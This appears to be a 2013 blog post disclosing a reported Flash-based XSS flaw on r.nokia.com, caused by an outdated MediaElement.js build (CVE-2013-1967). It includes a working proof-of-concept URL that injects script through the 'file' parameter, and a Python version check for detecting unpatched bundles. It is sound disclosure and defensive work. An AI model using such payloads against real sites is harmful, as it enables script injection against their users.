Flash-based XSS in Nokia's MediaElements component

June 29, 2013

Here I present a (reported) Flash-based XSS vulnerability that I discovered in r.nokia.com; exploiting it requires no user interaction.

PoC URL:

http://r.nokia.com/s/6.0/assets/js/flashmediaelement.swf?debug=true&file=x%22});alert(1);//&autoplay=true

This is a well-known vulnerability in MediaElement.js that was patched last year in version 2.11.2 (see CVE-2013-1967 and the GitHub patch commit).

The version running on r.nokia.com used to be 2.9.1, as could be seen in:

http://r.nokia.com/s/6.0/assets/js/mediaelement-and-player.js

(the file contains mejs.version="2.9.1";)
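The same fingerprint can be turned into a quick check for a deployed bundle. The following is an added example, not code from the original post or from the MediaElement.js project: it extracts the mejs.version assignment from a JavaScript bundle and compares it against 2.11.2, the version the post names as patched. The bundle snippets are constructed samples, and the "unknown" result for a missing version string is an assumption about how a practitioner would want absence reported.

```python
import re
from typing import Optional, Tuple

# Version in which the post says the issue was patched (MediaElement.js 2.11.2).
PATCHED_VERSION = (2, 11, 2)

# Matches the assignment quoted from mediaelement-and-player.js:
#   mejs.version="2.9.1";
VERSION_RE = re.compile(r'mejs\.version\s*=\s*["\'](\d+(?:\.\d+)*)["\']')


def parse_version(text: str) -> Optional[Tuple[int, ...]]:
    """Return the mejs.version found in a JS bundle as an int tuple, or None."""
    m = VERSION_RE.search(text)
    if not m:
        return None
    return tuple(int(part) for part in m.group(1).split("."))


def is_vulnerable(text: str) -> Optional[bool]:
    """True if the bundle reports a version older than the patched one.

    Returns None when no version string is present, so an absent fingerprint
    is reported as 'unknown' rather than silently treated as 'safe'.
    """
    version = parse_version(text)
    if version is None:
        return None
    # Pad short versions so "2.11" compares like "2.11.0".
    padded = version + (0,) * (len(PATCHED_VERSION) - len(version))
    return padded < PATCHED_VERSION


# Constructed samples mimicking the relevant fragment of a minified bundle;
# the first mirrors the version string the post observed on r.nokia.com.
SAMPLE_VULNERABLE = 'var mejs=mejs||{};mejs.version="2.9.1";mejs.meIndex=0;'
SAMPLE_PATCHED = 'var mejs=mejs||{};mejs.version="2.11.2";mejs.meIndex=0;'

if __name__ == "__main__":
    for label, body in (("vulnerable", SAMPLE_VULNERABLE), ("patched", SAMPLE_PATCHED)):
        print(label, parse_version(body), is_vulnerable(body))
```

Run it against the body of a fetched mediaelement-and-player.js to see whether a site still ships a pre-2.11.2 build.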

Screenshot using the Chrome debugger:

Screenshot of the XSS vulnerability triggered
Creative Commons Attribution-ShareAlike 4.0 International License